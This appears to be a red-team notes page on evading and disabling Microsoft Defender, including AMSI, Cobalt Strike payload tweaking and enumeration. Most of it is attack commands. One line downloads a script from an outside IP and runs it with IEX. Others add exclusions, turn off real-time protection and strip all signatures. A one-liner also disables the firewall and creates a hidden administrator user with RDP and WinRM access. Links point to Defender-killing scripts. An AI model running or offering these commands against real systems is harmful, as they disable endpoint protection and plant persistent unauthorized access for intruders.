Microsoft Defender Antivirus
1. On-Disk Detections
Even though dropping files to disk has a bad reputation, there are instances where it's fairly unavoidable if we want to use certain tactics.
For example, we have access to a server, but we can't PsExec to it because the service binary payload is being detected by Defender.
We can check it locally copying the payload to the desktop and checking the associated log:
copy C:\\Payloads\smb_x64.svc.exe .\Desktop\
Get-MpThreatDetection | sort $_.InitialDetectionTime | select-First 1
Cobalt Strike Artifcact Kit can be used to modify binary (EXE & DLLs) payloads.
2. In-Memory Detections
The Antimalware Scan Interface (AMSI) is a component of Windows which allows applications to integrate themselves with an antivirus engine by providing a consumable, language agnostic interface. It was designed to tackle "fileless" malware that was so heavily popularised by tools like the EmpireProject, which leveraged PowerShell for complete in-memory C2.
The alert that Defender produces is tagged with amsi: rather than file:, indicating that something malicious was detected in memory.
PowerShell files are a little easier to analyse compared to binary files - scanning it with ThreatCheck and the -e AMSI parameter, we see the bad strings.
C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\smb_x64.ps1 -e AMSI
Cobalt Strike Resource Kit can be used to modify script-based payloads including the PowerShell, Python, HTA and VBA templates.
3. Behavioral Detections
When dealing with behavioural detections, the Defender alerts look something like this:
In this example, is a Beacon running living inside the rundll32 process (PID 4404) which is the default and very common point of detection.
4. Enumeration
We want to determine which product is in place in order to simplify our bypass attempt. We also need to know if the antivirus supports AMSI.
To do this, we can use HostRecon.ps1.
powershell (new-object system.net.webclient).downloadstring('http://192.168.119.120/HostRecon.ps1') | IEX
Invoke-HostRecon
To determine if LSA protection is enabled with the Get-ItemProperty cmdlet:
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
With this, we can also locate the AppLocker rules:
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
5. Diasbleing
See excluded paths:
Get-MpPreference | select-object -ExpandProperty ExclusionPath
Add an exclusion directory:
Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads\SuperLegitDownloadDirectory"
Disable realtime monitoring altogether:
Set-MpPreference -DisableRealtimeMonitoring $true
Only disables scanning for downloaded files or attachments:
Set-MpPreference -DisableIOAVProtection $true
To remove all virus signatures from it:
cd "C:\Program Files\Windows Defender"
.\MpCmdRun.exe -RemoveDefinitions -All
One-liner (powershell) to remove virus signatures, disable realtime monitoring, disable downloads scanning, disable firewall, enable admin restricted mode for RDP pth and create an user "pepe" and add it to admins, rdp and winrm:
cd "C:\Program Files\Windows Defender" ; .\MpCmdRun.exe -RemoveDefinitions -All ; Set-NetFirewallProfile -Enabled False ; Set-MpPreference -DisableRealtimeMonitoring $true ; Set-MpPreference -DisableIOAVProtection $true ; cd "C:\Windows\Tasks" ; New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0 ; net user pepe Password123! /add; net localgroup Administrators pepe /add; net localgroup "Remote Desktop Users" pepe /add; net localgroup "Remote Management Users" pepe /add
We can also disable it with tools like:
https://github.com/In3x0rabl3/OSEP/blob/main/Bypass_Defender/DefendersDeath.ps1
https://github.com/In3x0rabl3/OSEP/blob/main/Bypass_Defender/FuckDefender.ps1
Last updated